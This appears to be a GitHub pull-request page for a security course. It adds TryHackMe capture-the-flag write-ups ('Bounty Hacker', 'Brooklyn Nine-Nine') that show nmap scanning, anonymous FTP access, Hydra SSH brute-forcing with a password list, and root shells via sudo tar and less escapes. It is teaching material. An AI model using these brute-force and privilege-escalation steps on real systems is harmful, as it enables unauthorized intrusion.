Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
81 commits
Select commit Hold shift + click to select a range
bf33fa5
Add images for session-10
cataliniovita Jul 17, 2022
b2f6076
Add README file for session-10
cataliniovita Jul 17, 2022
0135407
Modify README.md name to index.md
cataliniovita Jul 17, 2022
4a02d33
Remove README.md file
cataliniovita Jul 17, 2022
e2373c7
Modify images path
cataliniovita Jul 17, 2022
750fc3a
Move the explanation of CVE-2022-29464 at the end
cataliniovita Jul 17, 2022
0b0c832
Add Burp Suite explanation files
cataliniovita Jul 17, 2022
47bb8c3
Modify dimension of images
cataliniovita Jul 17, 2022
ff768ed
Update index.md
cataliniovita Jul 17, 2022
e66c00d
Update index.md
cataliniovita Jul 17, 2022
a156bbc
Update index.md
cataliniovita Jul 17, 2022
76e511a
Update index.md
cataliniovita Jul 17, 2022
19c7ccf
Delete burp_intercept.png
cataliniovita Jul 17, 2022
c612d39
Delete burp_repeater.png
cataliniovita Jul 17, 2022
2e373fe
Add dark color burp explanation files
cataliniovita Jul 17, 2022
cad0a53
Delete burp_intercept.png
cataliniovita Jul 17, 2022
851e126
Delete burp_repeater.png
cataliniovita Jul 17, 2022
f5f0db0
Add files via upload
cataliniovita Jul 17, 2022
90d97fb
Update index.md
cataliniovita Jul 17, 2022
27e5d09
Update index.md
cataliniovita Jul 17, 2022
54eca93
Update index.md
cataliniovita Jul 17, 2022
3824aed
Update index.md
cataliniovita Jul 17, 2022
d5d845c
Add webshell jsp file
cataliniovita Jul 17, 2022
2479e0b
Update index.md
cataliniovita Jul 17, 2022
5431d7f
Add crafted request image file
cataliniovita Jul 17, 2022
2a2d4de
Update index.md
cataliniovita Jul 17, 2022
afb7e23
Add passwd read file evidence
cataliniovita Jul 17, 2022
ba73b6f
Add files via upload
cataliniovita Jul 17, 2022
a843086
Update index.md
cataliniovita Jul 17, 2022
fe4b5ed
Add further reading section
cataliniovita Jul 17, 2022
919b9cb
Rename session-10 folder to end-to-end-attack
cataliniovita Jul 21, 2022
d7b5d87
Modify the readme file structure
cataliniovita Jul 21, 2022
a893383
Add explanation for CVE-2022-33891
cataliniovita Jul 21, 2022
101eeb9
Modify payload for spark CVE-2022-33891
cataliniovita Jul 21, 2022
d58c688
Add DNSLog explanation and image
cataliniovita Jul 22, 2022
bf571cc
Add request bin photo
cataliniovita Jul 22, 2022
799411b
Add second request bin image
cataliniovita Jul 23, 2022
d8c809a
Add request bin explanation for CVE 2022 33891
cataliniovita Jul 23, 2022
ab71ac7
Add simple curl image OOB
cataliniovita Jul 23, 2022
60c0f81
Add username evidence for vuln
cataliniovita Jul 23, 2022
c3ec868
Modify image dimension and change encoded string image name
cataliniovita Jul 23, 2022
4353eaa
Fix typos of the readme file
cataliniovita Jul 23, 2022
f20dd0c
Fix dimension of image inside readme file
cataliniovita Jul 23, 2022
1a02b4f
Update readme.md file
cataliniovita Jul 23, 2022
22d67a5
Add favicon hash for shodan.io
cataliniovita Jul 23, 2022
98b1886
Add github favicon
cataliniovita Jul 23, 2022
9df6b20
Change github favicon image name
cataliniovita Jul 23, 2022
b8eb0c4
Update readme.md
cataliniovita Jul 23, 2022
f0629d8
Add CVE-2021-41773
cataliniovita Jul 23, 2022
9096a82
Change image size
cataliniovita Jul 23, 2022
ac9796e
Change title headings
cataliniovita Jul 23, 2022
b24d357
Add first challenge from TryHackMe
cataliniovita Jul 23, 2022
b97deab
Add second challenge for session-10
cataliniovita Jul 23, 2022
859381e
Add third challenge on session-10
cataliniovita Jul 23, 2022
9fe48a6
Merge branch 'master' of https://github.com/security-summer-school/we…
cataliniovita Jul 23, 2022
bd5ddda
Add 4th challenge for session-10
cataliniovita Jul 23, 2022
0f92859
Add 5th challenge for session-10
cataliniovita Jul 23, 2022
febcdb3
Add Activities inside main index.md file
cataliniovita Jul 23, 2022
f18770d
Add 6th challenge for session-10
cataliniovita Jul 23, 2022
0c2e393
Add last challenge for session-10
cataliniovita Jul 23, 2022
96d8115
Fix typo for index.md file
cataliniovita Jul 23, 2022
2cad735
Change image names for brooklyn-nine-nine
cataliniovita Jul 23, 2022
bb752e6
Modify image file names for Madness
cataliniovita Jul 23, 2022
2f726a5
Modify image file names for Smag-Grotto
cataliniovita Jul 23, 2022
fb5230f
Modify file names for Overpass
cataliniovita Jul 23, 2022
bd74ef1
Modify filenames for Jack-Of-All-Trades challenge
cataliniovita Jul 23, 2022
83ace2c
Remove test file for Dav
cataliniovita Jul 23, 2022
1a0364c
Remove test file for Bhacker
cataliniovita Jul 23, 2022
74ad17d
Remove test file for
cataliniovita Jul 23, 2022
f6a9d78
Modify filename for Madness readme
cataliniovita Jul 23, 2022
e19993f
Resolve text review for session 10 main index md file
cataliniovita Jul 24, 2022
bf7a480
Add phases for an end-to-end attack
cataliniovita Jul 26, 2022
861ee93
Modify file structure for index md file
cataliniovita Jul 26, 2022
181a27d
Modify the file structure
cataliniovita Jul 26, 2022
ddc2e00
Add CVE-2021-41773 challenge
cataliniovita Jul 26, 2022
bbb9f67
Add solution for walker challenge
cataliniovita Jul 26, 2022
f276a58
Add wso2 challenge
cataliniovita Jul 26, 2022
2ade087
Add detached option for Dockerfile
cataliniovita Jul 26, 2022
8248f80
Add spark challenge
cataliniovita Jul 26, 2022
d1084aa
Solve typos for index md file
cataliniovita Jul 31, 2022
db31be4
Modify docker image for walker challenge
cataliniovita Jul 31, 2022
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
145 changes: 0 additions & 145 deletions 09-privilege-escalation/README.md

This file was deleted.

1 change: 0 additions & 1 deletion 10-best-practices/README.md

This file was deleted.

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
68 changes: 68 additions & 0 deletions end-to-end-attack/activities/bounty-hacker/index.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,68 @@
# 'Bounty Hacker' box writeup
## Bounty Hacker is a CTF box written by Sevuhl and available on the [TryHackMe platform](https://tryhackme.com).
## Read about [Tar in Linux](https://www.freecodecamp.org/news/tar-in-linux-example-tar-gz-tar-file-and-tar-directory-and-tar-compress-commands/) and [Breaking restricted environment with tar](https://gtfobins.github.io/gtfobins/tar/).
## ![bg](images/background.jpg?raw=true "Title")

+ **We deploy the machine and start with an nmap scan for open ports**

``nmap -sV -sC -oN scan1 10.10.229.13``

+ **We can see 3 open ports with some well known services: ftp, ssh and http, all opened on default ports**

![1](images/nmap_scan.jpg?raw=true "Nmap_scan")

+ **Next, we will try to connect to the ftp service using the default user anonymous**

![2](images/ftp_login.jpg?raw=true "Ftp_login")

+ **Listing the directory, we can observe two .txt files uploaded so let's get them**

``mget *.txt``

+ **Reading the task.txt file, we can find out who wrote the task list, giving us the first task answer. We list the second txt file, named locks.txt, and we can see multiple strings which seems to be some passwords kept in the ftp server**

```
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
...
```

+ **Let's try to use this password file to connect on the ssh service, using simultanously the user found in the previous task. The Hydra tool has a brute-force option to crack the login of the ssh service, so we can use it**

``hydra -l lin -P locks.txt 10.10.229.13 -t 4 ssh``

+ **After we execute the brute-force process, Hydra give us the needed user password**

# ![3](images/hydra_brute.jpg?raw=true "Hydra")

+ **With the given credentials, we will connect to the ssh service**

``ssh lin@10.10.229.13``

+ **We land on the wanted system so we can read our first user flag**

# ![4](images/first_flag.jpg?raw=true "first_flag")

+ **Running the** ``sudo -l`` **command on @lin user and listing the allowed commands, we can see that user @lin may run the following commands on bountyhacker:**
``(root) /bin/tar``

# ![5](images/whoami.jpg?raw=true "whoami")

+ **Tar is a linux utilitary, used by a lot of unix system administrators to create compressed archive files or to extract them. Looking into the tar manual, we can see that it has an option that can execute a command during the compress-program**

# ![6](images/tar.jpg?raw=true "tar manual")

+ **That being said, let's try to break our environment and spawn a shell using privilege escalation, getting access to the @root user**

``sudo tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'``

# ![Alt text](images/root_flag.jpg?raw=true "root_flag")
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
56 changes: 56 additions & 0 deletions end-to-end-attack/activities/brooklyn-nine-nine/index.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
# 'Brooklyn-Nine-Nine' box writeup
## Brooklyn Nine Nine is a CTF box written by Fsociety2006 and available on the [TryHackMe](https://tryhackme.com/) platform.
## Read about [Less Command](https://linuxize.com/post/less-command-in-linux/) and [Privilege Escalation using find, vim, less or bash](https://pentestlab.blog/category/privilege-escalation/)
# ![bg](images/background.jpeg?raw=true "Title")

## Foothold
+ **Let's deploy our machine and start with a nmap scan for ports**

``nmap -sV -sC -oN scan1 10.10.244.52``

+ **We can clearly see 3 ports open, a ftp, ssh and a http, all configured on default ports**

# ![1](images/nmap_scan_bnn.jpg?raw=true "nmap_scan")

**From the nmap report, the ftp anonymous login seems to be possible, so let's try it**

``ftp 10.10.244.52``

# ![2](images/ftp.jpg?raw=true "ftp")

**We successfully connected and we can see a** note_to_jake.txt **file inside the ftp server. We can get that file and read it**

``get note_to_jake.txt``
# ![3](images/change_password.jpg?raw=true "cp")

+ **Looks that Jake need to change his password. Because jake is using a very weak password, maybe we can bruteforce his login to some service. Let's use hydra to bruteforce the ssh serice - i'm using the rockyou.txt wordlist**

``hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.244.52 -t 4 ssh``

# ![4](images/hydra.jpg?raw=true "hydra")

## User escalation

+ **So here we got some ssh credentials. Let's connect on the ssh service and run a** ``sudo -l`` **command on the jake user**

# ![5](images/less.jpg?raw=true "less")

**It looks like jake can run the less command with su privillege. Less is a command which can display content of a file and we can navigate both forward and backward through the file. Let's try to read the user flag**

``sudo less /home/holt/user.txt``

# ![6](images/user_flag_1.jpg?raw=true "user")

## Root escalation

+ **And here it is our first flag. We can also use less to get a privesc and get root access. Let's read a file with less**

``less /etc/passwd``

**Then generate a shell for the root user**

``!/bin/sh``

# ![7](images/binsh.jpg?raw=true "binsh")

# ![8](images/root_flag_2.jpg?raw=true "root")
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added end-to-end-attack/activities/dav/images/sudol.jpg
Loading